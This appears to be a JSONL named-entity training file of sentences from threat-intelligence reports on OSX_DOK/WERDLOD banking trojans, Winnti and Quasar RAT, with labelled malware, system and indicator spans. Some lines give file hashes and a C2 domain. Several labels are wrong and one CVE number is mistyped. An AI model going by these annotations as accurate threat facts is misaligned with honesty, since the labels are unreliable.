{"text": "this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"System: RTF": [[5, 8]], "Vulnerability: CVE-2017-1882": [[28, 41]], "Indicator: eqnedt32.exe": [[45, 57]]}, "info": {"id": "aptner_train_006494", "source": "aptner_train"}}
{"text": "OSX Malware Linked to Operation Emmental Hijacks User Network Traffic .", "spans": {"System: OSX": [[0, 3]], "Malware: Malware": [[4, 11]]}, "info": {"id": "aptner_train_006522", "source": "aptner_train"}}
{"text": "The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple ’s OS X operating system .", "spans": {"Malware: OSX_DOK": [[4, 11]], "Malware: malware": [[12, 19]], "Organization: Trend Micro": [[34, 45]], "Malware: OSX_DOK.C": [[49, 58]], "System: Apple ’s OS X": [[178, 191]]}, "info": {"id": "aptner_train_006523", "source": "aptner_train"}}
{"text": "This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user ’s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006524", "source": "aptner_train"}}
{"text": "OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns—an interesting development that we will tackle further in this blog post .", "spans": {"Malware: OSX_DOK.C": [[0, 9]], "Malware: WERDLOD": [[41, 48]], "Organization: Trend Micro": [[63, 74]], "Malware: TROJ_WERDLOD Family": [[78, 97]]}, "info": {"id": "aptner_train_006525", "source": "aptner_train"}}
{"text": "OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": {"Malware: OSX_DOK.C": [[0, 9]], "Indicator: phishing email": [[30, 44]]}, "info": {"id": "aptner_train_006526", "source": "aptner_train"}}
{"text": "The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": {}, "info": {"id": "aptner_train_006527", "source": "aptner_train"}}
{"text": "The email also comes with two files attached claiming to contain questions for the user : one is a .zip file , which is a fake OS X app , while the other is a .docx file used to target Windows operating systems using WERDLOD .", "spans": {"System: email": [[4, 9]], "System: OS X app": [[127, 135]], "System: Windows": [[185, 192]], "Malware: WERDLOD": [[217, 224]]}, "info": {"id": "aptner_train_006528", "source": "aptner_train"}}
{"text": "Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": {"Malware: Banking Trojans": [[30, 45]]}, "info": {"id": "aptner_train_006529", "source": "aptner_train"}}
{"text": "Some examples of the files used in the email attachment include the following :", "spans": {"System: email": [[39, 44]]}, "info": {"id": "aptner_train_006530", "source": "aptner_train"}}
{"text": "Zahlungsinformationen 01.06.2017.zip .", "spans": {"Indicator: Zahlungsinformationen 01.06.2017.zip": [[0, 36]]}, "info": {"id": "aptner_train_006531", "source": "aptner_train"}}
{"text": "Zahlungsinformationen digitec.zip .", "spans": {"Indicator: Zahlungsinformationen digitec.zip": [[0, 33]]}, "info": {"id": "aptner_train_006532", "source": "aptner_train"}}
{"text": "Dokument 09.06.2017.zip .", "spans": {"Indicator: Dokument 09.06.2017.zip": [[0, 23]]}, "info": {"id": "aptner_train_006533", "source": "aptner_train"}}
{"text": "Dokument 09.06.2017.docx .", "spans": {"Indicator: Dokument 09.06.2017.docx": [[0, 24]]}, "info": {"id": "aptner_train_006534", "source": "aptner_train"}}
{"text": "06.2017.docx .", "spans": {"Indicator: 06.2017.docx": [[0, 12]]}, "info": {"id": "aptner_train_006535", "source": "aptner_train"}}
{"text": "Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": {}, "info": {"id": "aptner_train_006536", "source": "aptner_train"}}
{"text": "After this , the App Store on the system will be removed , followed by a full screen fake OS X update screen .", "spans": {"System: App Store": [[17, 26]], "System: OS X": [[90, 94]]}, "info": {"id": "aptner_train_006537", "source": "aptner_train"}}
{"text": "It will ask for a password to run command as root .", "spans": {}, "info": {"id": "aptner_train_006538", "source": "aptner_train"}}
{"text": "The malware will begin to download other utilities .", "spans": {"System: utilities": [[41, 50]]}, "info": {"id": "aptner_train_006539", "source": "aptner_train"}}
{"text": "It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": {"System: Homebrew": [[13, 21]], "System: software": [[39, 47]], "System: Golang": [[75, 81]], "System: Tor": [[86, 89]]}, "info": {"id": "aptner_train_006540", "source": "aptner_train"}}
{"text": "The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": {}, "info": {"id": "aptner_train_006541", "source": "aptner_train"}}
{"text": "The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": {"System: App Store": [[26, 35]]}, "info": {"id": "aptner_train_006542", "source": "aptner_train"}}
{"text": "The archive in Mac OS X looks like this :", "spans": {"System: Mac OS X": [[15, 23]]}, "info": {"id": "aptner_train_006543", "source": "aptner_train"}}
{"text": "Mac OS X will run the application if it passes certificates .", "spans": {"System: Mac OS X": [[0, 8]]}, "info": {"id": "aptner_train_006544", "source": "aptner_train"}}
{"text": "In this case , the malware is signed off by a “ developer ” , which may actually be a dummy account or that of a compromised user .", "spans": {}, "info": {"id": "aptner_train_006545", "source": "aptner_train"}}
{"text": "In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": {"Organization: CA": [[36, 38]]}, "info": {"id": "aptner_train_006546", "source": "aptner_train"}}
{"text": "The fake certificate imitates the COMODO root certificate .", "spans": {"Organization: COMODO": [[34, 40]]}, "info": {"id": "aptner_train_006547", "source": "aptner_train"}}
{"text": "Take note that the fake certificate does not contain a COMODO Certificate Authority seal that certifies its validity , as seen in the comparison below :", "spans": {"Organization: COMODO Certificate Authority": [[55, 83]]}, "info": {"id": "aptner_train_006548", "source": "aptner_train"}}
{"text": "We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": {"System: Mozilla Firefox": [[47, 62]], "System: Google Chrome": [[66, 79]], "System: browsers": [[96, 104]]}, "info": {"id": "aptner_train_006549", "source": "aptner_train"}}
{"text": "Of all the major browsers , only Safari uses the system ’s certificates .", "spans": {"System: browsers": [[17, 25]], "System: Safari": [[33, 39]]}, "info": {"id": "aptner_train_006550", "source": "aptner_train"}}
{"text": "We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": {"System: Windows": [[40, 47]], "System: Mac OS X": [[52, 60]]}, "info": {"id": "aptner_train_006551", "source": "aptner_train"}}
{"text": "There is a file shortcut embedded in the malicious .docx file—one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": {"Indicator: .docx": [[51, 56]], "System: Dropbox": [[109, 116]]}, "info": {"id": "aptner_train_006552", "source": "aptner_train"}}
{"text": "The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": {"Malware: malicious app": [[39, 52]], "System: tor": [[90, 93]], "System: proxy": [[98, 103]]}, "info": {"id": "aptner_train_006553", "source": "aptner_train"}}
{"text": "We have already notified Dropbox about the use of its service for this malware .", "spans": {"System: Dropbox": [[25, 32]]}, "info": {"id": "aptner_train_006554", "source": "aptner_train"}}
{"text": "Dropbox has already taken down the links .", "spans": {"System: Dropbox": [[0, 7]]}, "info": {"id": "aptner_train_006555", "source": "aptner_train"}}
{"text": "The malware will install two proxies running on local host port 5555 and 5588 .", "spans": {"System: proxies": [[29, 36]]}, "info": {"id": "aptner_train_006556", "source": "aptner_train"}}
{"text": "All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim ’s external IP address as parameter .", "spans": {}, "info": {"id": "aptner_train_006557", "source": "aptner_train"}}
{"text": "The first ( port 5555 ) proxy first finds the IP parameter .", "spans": {}, "info": {"id": "aptner_train_006558", "source": "aptner_train"}}
{"text": "If it is not in Switzerland , the traffic will proceed as normal .", "spans": {}, "info": {"id": "aptner_train_006559", "source": "aptner_train"}}
{"text": "If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": {"Indicator: IP": [[17, 19]], "Malware: malware will": [[49, 61]]}, "info": {"id": "aptner_train_006560", "source": "aptner_train"}}
{"text": "If the domain is in the target , the malware will perform a MitM attack and redirect the traffic to the second proxy ( port 5588 ) , which routes the traffic to the Tor network .", "spans": {}, "info": {"id": "aptner_train_006561", "source": "aptner_train"}}
{"text": "The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": {}, "info": {"id": "aptner_train_006562", "source": "aptner_train"}}
{"text": "The target domain ’s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": {}, "info": {"id": "aptner_train_006563", "source": "aptner_train"}}
{"text": "However , once the victim enters an account and password .", "spans": {}, "info": {"id": "aptner_train_006564", "source": "aptner_train"}}
{"text": "A window will pop out .", "spans": {}, "info": {"id": "aptner_train_006565", "source": "aptner_train"}}
{"text": "The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": {}, "info": {"id": "aptner_train_006566", "source": "aptner_train"}}
{"text": "We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": {}, "info": {"id": "aptner_train_006567", "source": "aptner_train"}}
{"text": "Once the user enters an account and password , it will initiate POST using AJAX .", "spans": {}, "info": {"id": "aptner_train_006568", "source": "aptner_train"}}
{"text": "The POST message is sent to the same site as the fake login page—which an attacker can control inside the Tor network .", "spans": {}, "info": {"id": "aptner_train_006569", "source": "aptner_train"}}
{"text": "We decoded the data section and found not only the account and password , but that it also fingerprinted the user ’s browser and system information .", "spans": {}, "info": {"id": "aptner_train_006570", "source": "aptner_train"}}
{"text": "While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": {"System: fake app": [[109, 117]], "Malware: OSX_DOK.C": [[141, 150]]}, "info": {"id": "aptner_train_006571", "source": "aptner_train"}}
{"text": "However , since they can inject code into the webpage , it means they have the ability to do this as well .", "spans": {}, "info": {"id": "aptner_train_006572", "source": "aptner_train"}}
{"text": "We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware .", "spans": {"System: Ultimate Packer": [[66, 81]], "System: Executables": [[86, 97]], "Malware: malware": [[169, 176]]}, "info": {"id": "aptner_train_006573", "source": "aptner_train"}}
{"text": "We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": {"System: UPX unpacker": [[68, 80]]}, "info": {"id": "aptner_train_006574", "source": "aptner_train"}}
{"text": "The malware is not obfuscated so we easily found interesting strings here .", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "aptner_train_006575", "source": "aptner_train"}}
{"text": "We can see that the malware relies on bash shell for most of its setup .", "spans": {"Malware: malware": [[20, 27]]}, "info": {"id": "aptner_train_006576", "source": "aptner_train"}}
{"text": "We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": {}, "info": {"id": "aptner_train_006577", "source": "aptner_train"}}
{"text": "The UPX gave a warning message about memory buffer overflow .", "spans": {"System: UPX": [[4, 7]]}, "info": {"id": "aptner_train_006578", "source": "aptner_train"}}
{"text": "The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine ’s scanning process .", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "aptner_train_006579", "source": "aptner_train"}}
{"text": "The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": {"System: UPX": [[84, 87]]}, "info": {"id": "aptner_train_006580", "source": "aptner_train"}}
{"text": "We have reported the issues to the UPX team , and they have already fixed it .", "spans": {"System: UPX": [[35, 38]]}, "info": {"id": "aptner_train_006581", "source": "aptner_train"}}
{"text": "While OSX_DOK.C is designed for MAC OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": {"Malware: OSX_DOK.C": [[6, 15]], "System: MAC": [[32, 35]], "Malware: WERDLOD": [[73, 80]], "System: Windows": [[97, 104]]}, "info": {"id": "aptner_train_006586", "source": "aptner_train"}}
{"text": "Both malware share the same proxy settings and script :", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006592", "source": "aptner_train"}}
{"text": "In particular , WERDLOD uses scripts running on http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} as proxy :", "spans": {"Malware: WERDLOD": [[16, 23]], "Indicator: http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip}": [[48, 101]]}, "info": {"id": "aptner_train_006594", "source": "aptner_train"}}
{"text": "Both malware have similar targets .", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006596", "source": "aptner_train"}}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006608", "source": "aptner_train"}}
{"text": "We then discuss how centralized response options , provided as enhancements to Windows Defender ATP with the Windows 10 Creators Update , can be used to quickly stop threats , including stopping command and control ( C&C ) communication and preventing existing implants from installing additional components or from moving laterally to other computers on the network .", "spans": {"System: centralized response options": [[20, 48]], "System: Windows Defender ATP": [[79, 99]], "System: the Windows 10 Creators Update": [[105, 135]]}, "info": {"id": "aptner_train_006615", "source": "aptner_train"}}
{"text": "Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"Malware: Win32/Barlaiy": [[37, 50]], "System: social network profiles": [[82, 105]], "System: collaborative document editing sites": [[108, 144]], "System: blogs": [[151, 156]]}, "info": {"id": "aptner_train_006622", "source": "aptner_train"}}
{"text": "The majority of victims recorded to date have been in electronic gaming , multimedia , and Internet content industries , although occasional intrusions against technology companies have occurred .", "spans": {"Organization: technology companies": [[160, 180]]}, "info": {"id": "aptner_train_006624", "source": "aptner_train"}}
{"text": "In contrast , LEAD has established a far greater reputation for industrial espionage .", "spans": {"Organization: LEAD": [[14, 18]]}, "info": {"id": "aptner_train_006625", "source": "aptner_train"}}
{"text": "Backdoor command and control .", "spans": {}, "info": {"id": "aptner_train_006653", "source": "aptner_train"}}
{"text": "Credential theft .", "spans": {}, "info": {"id": "aptner_train_006654", "source": "aptner_train"}}
{"text": "Winnti is no exception , and so , during Winnti ’s installation process , Windows Defender ATP is able to raise behavioral alerts .", "spans": {"Organization: Winnti": [[0, 6], [41, 47]], "System: Windows Defender ATP": [[74, 94]]}, "info": {"id": "aptner_train_006658", "source": "aptner_train"}}
{"text": "Meanwhile , connectivity to the Windows Defender ATP service is maintained .", "spans": {"System: Windows": [[32, 39]]}, "info": {"id": "aptner_train_006669", "source": "aptner_train"}}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006677", "source": "aptner_train"}}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006678", "source": "aptner_train"}}
{"text": "The initial infection vector in this attack is not clear , but it results in installing the “ Downeks ” downloader , which in turn infects the victim computer with the “ Quasar ” RAT .", "spans": {"Malware: Downeks": [[94, 101]], "Malware: Quasar": [[170, 176]], "System: RAT": [[179, 182]]}, "info": {"id": "aptner_train_006684", "source": "aptner_train"}}
{"text": "We observed these Quasar samples :", "spans": {"Malware: Quasar": [[18, 24]]}, "info": {"id": "aptner_train_006690", "source": "aptner_train"}}
{"text": "f-secure.exe : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f connects to hnoor.newphoneapp.com .", "spans": {"Indicator: f-secure.exe": [[0, 12]], "Indicator: 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f": [[15, 79]], "Indicator: hnoor.newphoneapp.com": [[92, 113]]}, "info": {"id": "aptner_train_006691", "source": "aptner_train"}}
{"text": "HD_Audio.exe : 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 crashes upon execution . sim.exe 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 connects to hnoor.newphoneapp.com .", "spans": {"Indicator: HD_Audio.exe": [[0, 12]], "Indicator: 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806": [[15, 79]], "Indicator: sim.exe": [[105, 112]], "Indicator: 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42": [[113, 177]], "Indicator: hnoor.newphoneapp.com": [[190, 211]]}, "info": {"id": "aptner_train_006693", "source": "aptner_train"}}
{"text": "We analyzed a Quasar sample we found that was communicating with an active C2 server at the time of analysis :", "spans": {"Malware: Quasar": [[14, 20]], "System: C2": [[75, 77]]}, "info": {"id": "aptner_train_006717", "source": "aptner_train"}}
{"text": "We discovered that the sample was obfuscated using .NET reactor .", "spans": {"Indicator: the sample": [[19, 29]], "System: obfuscated": [[34, 44]], "System: .NET reactor": [[51, 63]]}, "info": {"id": "aptner_train_006730", "source": "aptner_train"}}
{"text": "The configuration of Quasar is stored in the Settings object , which is encrypted with a password which is itself stored unencrypted .", "spans": {"Malware: Quasar": [[21, 27]]}, "info": {"id": "aptner_train_006735", "source": "aptner_train"}}
{"text": "Modifications :", "spans": {}, "info": {"id": "aptner_train_006736", "source": "aptner_train"}}
{"text": "Modifications :", "spans": {}, "info": {"id": "aptner_train_006743", "source": "aptner_train"}}
{"text": "Uses SHA256 instead of MD5 to create the key .", "spans": {}, "info": {"id": "aptner_train_006744", "source": "aptner_train"}}